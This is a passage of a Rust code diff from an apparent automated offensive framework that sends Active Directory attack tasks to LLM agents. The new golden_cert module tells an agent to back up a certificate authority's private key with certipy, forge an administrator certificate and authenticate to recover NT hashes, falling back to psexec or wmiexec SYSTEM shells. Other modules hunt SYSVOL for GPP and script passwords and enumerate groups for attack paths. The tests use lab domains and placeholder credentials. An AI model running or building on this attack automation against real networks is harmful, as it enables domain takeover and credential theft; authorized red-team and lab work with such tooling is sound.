assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_skips_domain_without_dc() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + // Only contoso has a DC + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_quarantined_credential_falls_back() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_foreign_group_work(&state); + // Both domains should still get work (gooduser fallback for contoso) + assert_eq!(work.len(), 2); + // contoso should fall back to gooduser + let contoso_work = work.iter().find(|w| w.domain == "contoso.local").unwrap(); + assert_eq!(contoso_work.credential.username, "gooduser"); + } + + #[test] + fn collect_skips_empty_password() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_foreign_group_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 2); + } +} diff --git a/ares-cli/src/orchestrator/automation/golden_cert.rs b/ares-cli/src/orchestrator/automation/golden_cert.rs new file mode 100644 index 00000000..c643cf49 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/golden_cert.rs @@ -0,0 +1,525 @@ +//! auto_golden_cert -- forge a Golden Certificate after owning an ADCS CA host. +//! +//! When a CA host is fully owned (local SYSTEM via lateral movement) and the +//! CA's domain is not yet dominated, drive the offline Golden Certificate +//! pipeline: +//! +//! 1. **Backup**: `certipy ca -backup` extracts the CA private key + cert +//! to a PFX (requires SYSTEM/local admin or CA admin rights — owning the +//! CA host satisfies this). +//! 2. **Forge**: `certipy forge -ca-pfx -upn administrator@` +//! produces a client-auth certificate signed by the CA, for any UPN. +//! No DC interaction is needed — purely offline. +//! 3. **Auth**: `certipy auth -pfx forged.pfx -dc-ip ` performs PKINIT +//! to obtain the target user's NT hash. +//! +//! This is the universal terminal for cross-forest compromise: every ADCS- +//! adjacent attack path (ESC1/ESC4/ESC8, MSSQL→xp_cmdshell→host, RBCD → +//! S4U → SYSTEM, shadow creds → admin → host) converges here once the CA +//! host is owned, regardless of which forest the CA lives in. +//! +//! Cross-forest note: the CA's *own* domain credential is what we need for +//! the `certipy ca -backup` RPC call. We pull it via `find_source_credential` +//! / `find_trust_credential` so a cred from the originating forest works +//! when there is no same-domain cred yet. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Watches for owned CA hosts and dispatches Golden Certificate pipelines. +/// Interval: 30s. +pub async fn auto_golden_cert(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("golden_cert") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_golden_cert_work(&state) + }; + + for item in work { + let mut payload = json!({ + "technique": "golden_cert", + "ca_host": item.ca_host, + "ca_hostname": item.ca_hostname, + "domain": item.domain, + "target_user": "administrator", + "target_upn": format!("administrator@{}", item.domain), + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "username": item.credential.username, + "password": item.credential.password, + "objectives": [ + "Step 1 (backup): run `certipy_ca` with backup=true, ca=, username/password from credential, dc_ip=. Requires SYSTEM or CA admin on the CA host — since this host is owned, you can also run a SYSTEM shell (psexec/wmiexec) and execute certipy locally.", + "Step 2 (forge): run `certipy_forge` with ca_pfx=, upn=`administrator@`. Output is a forged client-auth certificate signed by the CA private key — no DC interaction needed.", + "Step 3 (auth): run `certipy_auth` with pfx_path=, domain=, dc_ip= to PKINIT-authenticate as administrator and recover the NT hash.", + "If you don't yet know the CA name, run `certipy_find` first against this host to discover it (the CA's `Name` / `DNS Name`).", + "If `certipy_ca -backup` fails with an RPC/perm error from a network cred, fall back to a local SYSTEM shell (psexec/wmiexec to ca_host) and run certipy from there — the host is owned.", + ], + }); + + if let Some(ref dc) = item.dc_ip { + payload["dc_ip"] = json!(dc); + payload["target_ip"] = json!(dc); + } + if let Some(ref ca_name) = item.ca_name { + payload["ca_name"] = json!(ca_name); + } + if let Some(ref sid) = item.domain_sid { + payload["domain_sid"] = json!(sid); + payload["admin_sid"] = json!(format!("{sid}-500")); + } + + let priority = dispatcher.effective_priority("golden_cert"); + match dispatcher + .throttled_submit("exploit", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + ca_host = %item.ca_host, + domain = %item.domain, + "Golden Certificate pipeline dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_GOLDEN_CERT, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_GOLDEN_CERT, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(ca_host = %item.ca_host, "Golden Cert deferred by throttler"); + } + Err(e) => { + warn!(err = %e, ca_host = %item.ca_host, "Failed to dispatch Golden Cert"); + } + } + } + } +} + +/// Pure logic so it can be unit-tested without a `Dispatcher` or runtime. +fn collect_golden_cert_work(state: &StateInner) -> Vec { + state + .hosts + .iter() + .filter(|h| h.owned) + .filter_map(|h| { + let host_lower = h.ip.to_lowercase(); + let hostname_lower = h.hostname.to_lowercase(); + + let is_ca = state.shares.iter().any(|s| { + s.name.to_lowercase() == "certenroll" + && (s.host == h.ip || s.host.to_lowercase() == hostname_lower) + }); + if !is_ca { + return None; + } + + let domain = extract_domain_from_fqdn(&h.hostname).and_then(|d| { + if state.domains.iter().any(|known| known.to_lowercase() == d) { + Some(d) + } else { + state + .domains + .iter() + .find(|known| d.ends_with(&format!(".{}", known.to_lowercase()))) + .or_else(|| { + state + .domains + .iter() + .find(|known| known.to_lowercase().ends_with(&format!(".{d}"))) + }) + .cloned() + .or(Some(d)) + } + })?; + + // Don't forge a Golden Cert against a domain we already own. + if state.dominated_domains.contains(&domain) { + return None; + } + + let dedup_key = format!("{}:{}", host_lower, domain.to_lowercase()); + if state.is_processed(DEDUP_GOLDEN_CERT, &dedup_key) { + return None; + } + + // The certipy_ca call needs a credential that authenticates to the + // CA host's domain. Try same-domain first, then trusted-domain + // (cross-forest) as fallback. + let same_domain = state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !c.username.starts_with('$') + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned(); + + let credential = same_domain.or_else(|| state.find_trust_credential(&domain))?; + + let dc_ip = state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned(); + + let domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned(); + + let ca_name = lookup_ca_name(state, &h.ip, &h.hostname); + + Some(GoldenCertWork { + ca_host: h.ip.clone(), + ca_hostname: h.hostname.clone(), + dedup_key, + domain, + dc_ip, + domain_sid, + ca_name, + credential, + }) + }) + .collect() +} + +/// Extract the domain portion of an FQDN ("ca01.contoso.local" -> "contoso.local"). +fn extract_domain_from_fqdn(fqdn: &str) -> Option { + fqdn.to_lowercase() + .split_once('.') + .map(|(_, d)| d.to_string()) +} + +/// Look up a CA name from previously-discovered ADCS vulns on this host. +/// Falls back to None if no `certipy_find` result has populated `ca_name` yet — +/// the LLM agent is instructed to run certipy_find first when this is missing. +fn lookup_ca_name(state: &StateInner, host_ip: &str, hostname: &str) -> Option { + let host_l = host_ip.to_lowercase(); + let hn_l = hostname.to_lowercase(); + state + .discovered_vulnerabilities + .values() + .filter(|v| { + let t = v.target.to_lowercase(); + t == host_l || t == hn_l + }) + .find_map(|v| { + for key in &["ca_name", "CA", "ca"] { + if let Some(s) = v.details.get(*key).and_then(|x| x.as_str()) { + if !s.is_empty() { + return Some(s.to_string()); + } + } + } + None + }) +} + +struct GoldenCertWork { + ca_host: String, + ca_hostname: String, + dedup_key: String, + domain: String, + dc_ip: Option, + domain_sid: Option, + ca_name: Option, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Credential, Host, Share}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, owned: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned, + } + } + + fn make_share(host: &str, name: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: String::new(), + comment: String::new(), + } + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_GOLDEN_CERT, "golden_cert"); + } + + #[test] + fn extract_domain_typical() { + assert_eq!( + extract_domain_from_fqdn("ca01.contoso.local"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn extract_domain_case_insensitive() { + assert_eq!( + extract_domain_from_fqdn("CA01.CONTOSO.LOCAL"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn extract_domain_bare_hostname() { + assert_eq!(extract_domain_from_fqdn("ca01"), None); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_golden_cert_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_unowned_ca_host_skipped() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert!(work.is_empty(), "unowned CA host should not yield work"); + } + + #[test] + fn collect_owned_non_ca_host_skipped() { + let mut state = StateInner::new("test-op".into()); + // Owned host but no CertEnroll share + state + .hosts + .push(make_host("192.168.58.20", "fs01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert!(work.is_empty(), "non-CA owned host should not yield work"); + } + + #[test] + fn collect_owned_ca_with_same_domain_cred_yields_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].ca_host, "192.168.58.50"); + assert_eq!(work[0].ca_hostname, "ca01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].dedup_key, "192.168.58.50:contoso.local"); + } + + #[test] + fn collect_dominated_domain_skipped() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state.dominated_domains.insert("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert!( + work.is_empty(), + "should not forge against an already-dominated domain" + ); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_GOLDEN_CERT, "192.168.58.50:contoso.local".into()); + let work = collect_golden_cert_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + // No credentials at all + let work = collect_golden_cert_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_resolves_dc_ip_when_available() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip.as_deref(), Some("192.168.58.10")); + } + + #[test] + fn collect_certenroll_case_insensitive() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "certenroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_picks_domain_sid_when_known() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .domain_sids + .insert("contoso.local".into(), "S-1-5-21-1111-2222-3333".into()); + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + assert_eq!( + work[0].domain_sid.as_deref(), + Some("S-1-5-21-1111-2222-3333") + ); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "CA01.CONTOSO.LOCAL", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + // Dedup key uses lowercase IP (already lowercase here) and lowercase domain + assert_eq!(work[0].dedup_key, "192.168.58.50:contoso.local"); + } + + #[test] + fn collect_multiple_owned_cas_yields_multiple_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state.shares.push(make_share("192.168.58.51", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state + .hosts + .push(make_host("192.168.58.51", "ca02.fabrikam.local", true)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fabadmin", "Fab!Pass", "fabrikam.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 2); + } +} diff --git a/ares-cli/src/orchestrator/automation/golden_ticket.rs b/ares-cli/src/orchestrator/automation/golden_ticket.rs index d58b7372..3127cb0c 100644 --- a/ares-cli/src/orchestrator/automation/golden_ticket.rs +++ b/ares-cli/src/orchestrator/automation/golden_ticket.rs @@ -229,7 +229,7 @@ pub async fn auto_golden_ticket(dispatcher: Arc, mut shutdown: watch /// Uses the credential's own domain for NTLM auth (not the target domain) so /// cross-domain trust authentication works — e.g. a `child.contoso.local` /// cred can resolve the SID of `contoso.local` via its parent DC. -async fn resolve_domain_sid( +pub(crate) async fn resolve_domain_sid( _domain: &str, dc_ip: &str, password_cred: Option<&ares_core::models::Credential>, diff --git a/ares-cli/src/orchestrator/automation/gpp_sysvol.rs b/ares-cli/src/orchestrator/automation/gpp_sysvol.rs new file mode 100644 index 00000000..a2d6d049 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/gpp_sysvol.rs @@ -0,0 +1,342 @@ +//! auto_gpp_sysvol -- search for GPP passwords and credential artifacts in SYSVOL. +//! +//! Group Policy Preferences (GPP) XML files can contain encrypted passwords +//! using a publicly known AES key (MS14-025). SYSVOL scripts (.bat, .ps1, .vbs) +//! often contain hardcoded credentials. +//! +//! Dispatches two techniques per DC: +//! 1. `gpp_password_finder` — searches SYSVOL for Groups.xml, Scheduledtasks.xml, etc. +//! 2. `sysvol_script_search` — greps SYSVOL scripts for passwords/credentials + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect GPP/SYSVOL work items from state (pure logic, no async). +fn collect_gpp_sysvol_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("gpp:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_GPP_SYSVOL, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(GppSysvolWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Searches SYSVOL for GPP passwords and script credentials. +/// Interval: 45s. +pub async fn auto_gpp_sysvol(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("gpp_sysvol") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_gpp_sysvol_work(&state) + }; + + for item in work { + let payload = json!({ + "techniques": ["gpp_password_finder", "sysvol_script_search"], + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("gpp_sysvol"); + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "GPP/SYSVOL credential search dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_GPP_SYSVOL, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_GPP_SYSVOL, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "GPP/SYSVOL task deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch GPP/SYSVOL search"); + } + } + } + } +} + +struct GppSysvolWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("gpp:{}", "contoso.local"); + assert_eq!(key, "gpp:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_GPP_SYSVOL, "gpp_sysvol"); + } + + #[test] + fn payload_contains_both_techniques() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "techniques": ["gpp_password_finder", "sysvol_script_search"], + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + let techniques = payload["techniques"].as_array().unwrap(); + assert_eq!(techniques.len(), 2); + assert_eq!(techniques[0], "gpp_password_finder"); + assert_eq!(techniques[1], "sysvol_script_search"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = GppSysvolWork { + dedup_key: "gpp:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "gpp:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("gpp:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "gpp:contoso.local"); + } + + #[test] + fn two_tasks_per_domain() { + // The payload dispatches two techniques in a single submission per domain + let techniques = ["gpp_password_finder", "sysvol_script_search"]; + assert_eq!(techniques.len(), 2); + } + + // --- collect_gpp_sysvol_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_gpp_sysvol_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_gpp_sysvol_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "gpp:contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_GPP_SYSVOL, "gpp:contoso.local".into()); + let work = collect_gpp_sysvol_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_multiple_domains_produces_multiple_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + state + .credentials + .push(make_cred("conuser", "contoso.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "conuser"); + } + + #[test] + fn collect_case_insensitive_domain_match() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "gpp:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("gpp:{}", "contoso.local"); + let key2 = format!("gpp:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } +} diff --git a/ares-cli/src/orchestrator/automation/group_enumeration.rs b/ares-cli/src/orchestrator/automation/group_enumeration.rs new file mode 100644 index 00000000..43723890 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/group_enumeration.rs @@ -0,0 +1,615 @@ +//! auto_group_enumeration -- enumerate domain groups and memberships via LDAP. +//! +//! Dispatches per-domain LDAP group enumeration to discover security groups, +//! their members, and cross-domain memberships. This covers a large gap in +//! attack surface mapping — group membership determines ACL attack paths, +//! privilege escalation chains, and cross-domain lateral movement. +//! +//! The recon agent queries `(objectCategory=group)` and resolves membership +//! recursively, including Foreign Security Principals for cross-domain groups. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect group enumeration work items from current state. +/// +/// Pure logic extracted from `auto_group_enumeration` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_group_enum_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() && state.hashes.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + let all_dcs = state.all_domains_with_dcs(); + if all_dcs.is_empty() { + return Vec::new(); + } + debug!( + domains = ?all_dcs.iter().map(|(d,_)| d.as_str()).collect::>(), + trusted = ?state.trusted_domains.keys().collect::>(), + creds = state.credentials.len(), + hashes = state.hashes.len(), + "Group enum state check" + ); + for (domain, dc_ip) in &all_dcs { + // Use separate dedup keys for cred vs hash attempts so a failed + // password-based attempt (e.g., mislabeled credential domain) + // doesn't permanently block the hash-based path. + let dedup_key_cred = format!("group_enum:{}:cred", domain.to_lowercase()); + let dedup_key_hash = format!("group_enum:{}:hash", domain.to_lowercase()); + let dedup_key_trust = format!("group_enum:{}:trust", domain.to_lowercase()); + + // Prefer same-domain cleartext cred, then fall back to trust-compatible + // cred (child→parent or cross-forest). Trust-based attempts use a + // separate dedup key so they don't block hash-based fallback. + let (cred, using_trust_cred) = + if !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_cred) { + let c = state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .cloned(); + (c, false) + } else { + (None, false) + }; + let (cred, using_trust_cred) = + if cred.is_none() && !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_trust) { + match state.find_trust_credential(domain) { + Some(c) => (Some(c), true), + None => (None, using_trust_cred), + } + } else { + (cred, using_trust_cred) + }; + + // Look for NTLM hash (PTH) — fires independently of cred attempt + let (ntlm_hash, ntlm_hash_username) = + if cred.is_none() && !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_hash) { + state + .hashes + .iter() + .find(|h| { + h.hash_type.to_lowercase() == "ntlm" + && h.domain.to_lowercase() == domain.to_lowercase() + && h.username.to_lowercase() == "administrator" + }) + .or_else(|| { + state.hashes.iter().find(|h| { + h.hash_type.to_lowercase() == "ntlm" + && h.domain.to_lowercase() == domain.to_lowercase() + && !state.is_delegation_account(&h.username) + }) + }) + .map(|h| (Some(h.hash_value.clone()), Some(h.username.clone()))) + .unwrap_or((None, None)) + } else { + (None, None) + }; + + // Need at least a credential or an NTLM hash + if cred.is_none() && ntlm_hash.is_none() { + debug!( + domain = %domain, + cred_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_cred), + trust_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_trust), + hash_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_hash), + "Group enum: no credential/hash found for domain" + ); + continue; + } + + let dedup_key = if ntlm_hash.is_some() { + dedup_key_hash + } else if using_trust_cred { + dedup_key_trust + } else { + dedup_key_cred + }; + + items.push(GroupEnumWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred.unwrap_or_else(|| ares_core::models::Credential { + id: 